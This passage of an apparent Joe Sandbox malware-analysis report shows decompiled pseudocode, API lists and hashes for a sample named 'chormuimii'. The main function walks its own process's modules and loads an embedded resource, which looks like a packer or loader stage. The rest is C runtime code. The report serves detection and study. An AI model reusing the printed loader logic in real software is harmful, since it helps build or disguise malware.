												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x76afcf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
0x00401bdb
0x00401be0
0x00401be5
0x00401bea
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00401c03
0x00401c08
0x00401c0d
0x00401c12
0x00401c17
0x00401c1c
0x00401c21
0x00401c26
0x00401c2b
0x00401c30
0x00401c35
0x00401c3a
0x00401c3f
0x00401c44
0x00401c48
0x00401c4f
0x00401dc3
0x00401dc4
0x00401de0
0x00401de2
0x00401de7
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e05
0x00401e0a
0x00401e0f
0x00401e14
0x00401e19
0x00401e1e
0x00401e23
0x00401e28
0x00401e2d
0x00401e32
0x00401e37
0x00401e3c
0x00401e41
0x00401e46
0x00401e4b
0x00401e50
0x00401e55
0x00401e5a
0x00401e5f
0x00401e64
0x00401e69
0x00401e6e
0x00401e73
0x00401e78
0x00401e7d
0x00401e82
0x00401e86
0x00401e8b
0x00401e96
0x00401e9a
0x00401ea4
0x00401eaf
0x00401eba
0x00401ebf
0x00401ec4
0x00401ec6
0x00401ecb
0x00401ece
0x00401ed2
0x00401ed4
0x00401eef
0x00401ed6
0x00401edd
0x00401ee2
0x00401ee6
0x00401ee9
0x00401ee9
0x00401ef7
0x00401efc
0x00401f02
0x00401f08
0x00401f0c
0x00401f15
0x00401f18
0x00401f1a
0x00401f1c
0x00401f22
0x00401f22
0x00401f24
0x00401f28
0x00401f2f
0x00401f33
0x00401f33
0x00401f40
0x00401f45
0x00401f4a
0x00401f4b
0x00401f50
0x00401f58
0x00401f58
0x00401f58
0x00401f58
0x00401f33
0x00401f63
0x00401f63
0x00401f69
0x00401f72
0x00401f72
0x00401f72
0x00401f73
0x00401f75
0x00401f7b
0x00401f80
0x00401f81
0x00401f86
0x00401f86
0x00401f8c
0x00401f8d
0x00401f8d
0x00401f9d
0x00401fa2
0x00401fa6
0x00401fac
0x00401faf
0x00401fb6
0x00401fbf
0x00401fc4
0x00401fc8
0x00401fce
0x00401fd3
0x00401fe0
0x00401fec
0x00401ffe
0x00402001
0x00402006
0x0040200b
0x00402010
0x00402015
0x0040201a
0x0040201f
0x00402024
0x00402029
0x0040202e
0x00402033
0x00402038
0x0040203d
0x00402042
0x00402047
0x0040204c
0x00402051
0x00402056
0x0040205b
0x00402060
0x00402065
0x0040206a
0x0040206f
0x00402074
0x00402079
0x0040207e
0x00402083
0x00402088
0x0040208d
0x00402092
0x00402097
0x0040209c
0x004020a1
0x004020a5
0x004020aa
0x004020ae
0x004020b4
0x004020b6
0x004020bb
0x004020c0
0x004020c5
0x004020ca
0x004020cf
0x004020d4
0x004020e1
0x004020e6
0x004020eb
0x004020f0
0x004020f5
0x004020fa
0x004020ff
0x00402104
0x00402109
0x0040210e
0x00402113
0x00402118
0x0040211d
0x00402122
0x00402127
0x0040212c
0x00402131
0x00402136
0x0040213b
0x00402140
0x00402145
0x0040214a
0x0040214f
0x00402154
0x00402159
0x0040215e
0x00402163
0x00402167
0x0040216c
0x00402171
0x00402177
0x00402179
0x0040217c
0x0040217e
0x00402183
0x00402188
0x0040218f
0x00402196
0x0040219a
0x0040219e
0x004021a2
0x004021a4
0x004021bc
0x004021be
0x004021c0
0x004021c6
0x004021ca
0x004021e5
0x004021ec
0x004021f1
0x00402213
0x00402215
0x00402217
0x0040221d
0x00402239
0x0040223b
0x0040223d
0x00402243
0x0040224d
0x0040224f
0x00402251
0x00402260
0x00402264
0x00402269
0x00402277
0x0040227b
0x00402286
0x00402293
0x004022af
0x004022b1
0x004022b5
0x004022b7
0x004022be
0x004022be
0x004022d7
0x004022e8
0x004022ef
0x004022f6
0x00402300
0x00402304
0x00402308
0x00402315
0x0040231a
0x0040231e
0x00402324
0x00402328
0x0040232a
0x00402331
0x00402331
0x0040234e
0x00402350
0x00402352
0x00402355
0x00402355
0x0040235b
0x0040235f
0x00402361
0x00402368
0x00402368
0x0040236d
0x00402371
0x00402373
0x00402375
0x0040237b
0x0040237b
0x00402377
0x00402377
0x00402377
0x00402390
0x00402396
0x0040239c
0x004023a0
0x004023a2
0x004023a9
0x004023a9
0x004023ae
0x004023b2
0x004023b4
0x004023ba
0x004023ba
0x004023b6
0x004023b6
0x004023b6
0x004023ce
0x004023d1
0x004023d3
0x004023dd
0x004023ec
0x004023ef
0x004023fe
0x00402401
0x00402403
0x00402411
0x00402417
0x00402424
0x00402426
0x0040242a
0x0040242c
0x00402434
0x00402434
0x0040243a
0x0040243f
0x00402443
0x00402445
0x0040244d
0x0040244d
0x00402445
0x00402251
0x0040223d
0x0040244f
0x0040245d
0x0040245f
0x00402461
0x00402462
0x00402467
0x00402467
0x0040245f
0x004021ca
0x0040246a
0x0040246e
0x00402470
0x00402478
0x00402478
0x0040247a
0x0040247e
0x00402480
0x00402488
0x00402488
0x00402480
0x00000000
0x00401c55
0x00401c62
0x00401c67
0x00401c6a
0x00401c6c
0x00401c73
0x00401c73
0x00401c77
0x00000000
0x00000000
0x00401c7b
0x00401c8f
0x00401c8f
0x00401c7d
0x00401c7d
0x00401c83
0x00000000
0x00401c85
0x00401c85
0x00401c88
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c8d
0x00401c83
0x00401c98
0x00401c9a
0x00401cbd
0x00401cc2
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd0
0x00401cd2
0x00401cd4
0x00000000
0x00000000
0x00401cd6
0x00401cd8
0x00401cec
0x00401cec
0x00401cda
0x00401cda
0x00401cdd
0x00401ce0
0x00000000
0x00401ce2
0x00401ce2
0x00401ce5
0x00401ce8
0x00401cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00401cea
0x00401ce0
0x00401cf5
0x00401cf5
0x00401cf7
0x00000000
0x00401cf9
0x00401d02
0x00401d07
0x00401d09
0x00401d10
0x00401d1d
0x00401d22
0x00401d25
0x00401d27
0x00401d30
0x00401d30
0x00401d32
0x00401d34
0x00000000
0x00000000
0x00401d36
0x00401d38
0x00401d4c
0x00401d4c
0x00401d3a
0x00401d3a
0x00401d3d
0x00401d40
0x00000000
0x00401d42
0x00401d42
0x00401d45
0x00401d48
0x00401d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d4a
0x00401d40
0x00401d55
0x00401d55
0x00401d57
0x00000000
0x00401d5d
0x00401d6a
0x00401d6f
0x00401d72
0x00401d74
0x00401d80
0x00401d80
0x00401d82
0x00401d84
0x00000000
0x00000000
0x00401d86
0x00401d88
0x00401d9c
0x00401d9c
0x00401d8a
0x00401d8a
0x00401d8d
0x00401d90
0x00000000
0x00401d92
0x00401d92
0x00401d95
0x00401d98
0x00401d9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d9a
0x00401d90
0x00401da5
0x00401da5
0x00401da7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401da7
0x00401da0
0x00401da2
0x00000000
0x00401da2
0x00000000
0x00401d57
0x00401d50
0x00401d52
0x00000000
0x00401dad
0x00401db6
0x00401dbb
0x00401dbb
0x00401d10
0x00000000
0x00401d09
0x00000000
0x00401cf7
0x00401cf0
0x00401cf2
0x00000000
0x00401c9c
0x00401c9c
0x00401c9d
0x00401caf
0x00401caf
0x00000000
0x00401c9a
0x00401c93
0x00401c95
0x00000000
0x00401c95
0x00401c4f
0x00000000

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32 ref: 00401D02
Module32Next.KERNEL32 ref: 00401DB6
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

[, xrefs: 00402047
U, xrefs: 004020F5
6, xrefs: 004020C5
v, xrefs: 00401B5A
4, xrefs: 00402136
{, xrefs: 0040205B
x, xrefs: 0040214A
W, xrefs: 00402033
x, xrefs: 00401B78
h, xrefs: 00401A6F
!, xrefs: 004020CF
D, xrefs: 00401DFB
v, xrefs: 0040212C
5, xrefs: 00402109
x, xrefs: 00402088
v, xrefs: 00401E4B
{, xrefs: 00401B4B
{, xrefs: 0040211D
E, xrefs: 00401E0F
W, xrefs: 00401B14
8, xrefs: 00401BA9
), xrefs: 0040202E
*, xrefs: 004020E1
o, xrefs: 00402159
:, xrefs: 00401B28
4, xrefs: 00402074
", xrefs: 00401B0F
V, xrefs: 00402038
!, xrefs: 00401B1E
., xrefs: 00401B0A
x, xrefs: 00401E69
{, xrefs: 00401E3C
W, xrefs: 00401B23
[, xrefs: 00401B37
o, xrefs: 00401B8D
*, xrefs: 00401A1F
4, xrefs: 00401B64
', xrefs: 00401AF6
_._, xrefs: 00402257
!, xrefs: 0040201A
V, xrefs: 00401E19
0, xrefs: 00401BBD
W, xrefs: 004020E6
o, xrefs: 00402097
v, xrefs: 0040206A
%, xrefs: 004020FA
___, xrefs: 0040227D
', xrefs: 00402006
., xrefs: 0040201F

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0, Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}

0x004018f0
0x004018f2
0x004018f6
0x004018fa
0x00401917
0x0040191a
0x0040192f
0x00401939
0x0040193b
0x0040193e
0x00401940
0x00401949
0x0040195e
0x0040196b
0x00401980
0x0040198a
0x0040198c
0x0040198c
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199a
0x004018fc
0x004018fc
0x00401900
0x00401900

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

0x0040af66
0x0040af66
0x0040af69
0x0040af7d
0x0040af80
0x0040af88
0x00000000
0x00000000
0x0040af73
0x0040af79
0x0040af7b
0x0040af8c
0x0040af98
0x0040af9a
0x0040af9a
0x0040afa3
0x0040afad
0x0040afb2
0x0040afb7
0x0040afc5
0x0040afca
0x0040afd0
0x0040aec2
0x0040b6b5
0x0040b6b7
0x0040b6bc
0x0040b6c1
0x0040b6c4
0x0040b6c6
0x0040b6c8
0x0040b6cf
0x0040b714
0x00000000
0x0040b6d1
0x0040b6d3
0x0040b6d9
0x0040b6de
0x0040b6e4
0x0040b6e7
0x0040b6e9
0x0040b6eb
0x0040b6ec
0x0040b6ed
0x0040b6f3
0x0040b6f4
0x0040b6fb
0x0040b700
0x0040b704
0x0040b706
0x0040b715
0x0040b723
0x0040b725
0x0040b727
0x0040b73a
0x0040b73c
0x0040b725
0x0040b704
0x0040b6cf
0x0040b742
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af7b
0x0040af8b
0x00000000

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EE, Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}

0x0040e7f6
0x0040e7ff

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000006.00000002.309445109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.309434206.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309464300.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.309472974.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309479356.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.309496101.00000000004A2000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_chormuimii.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
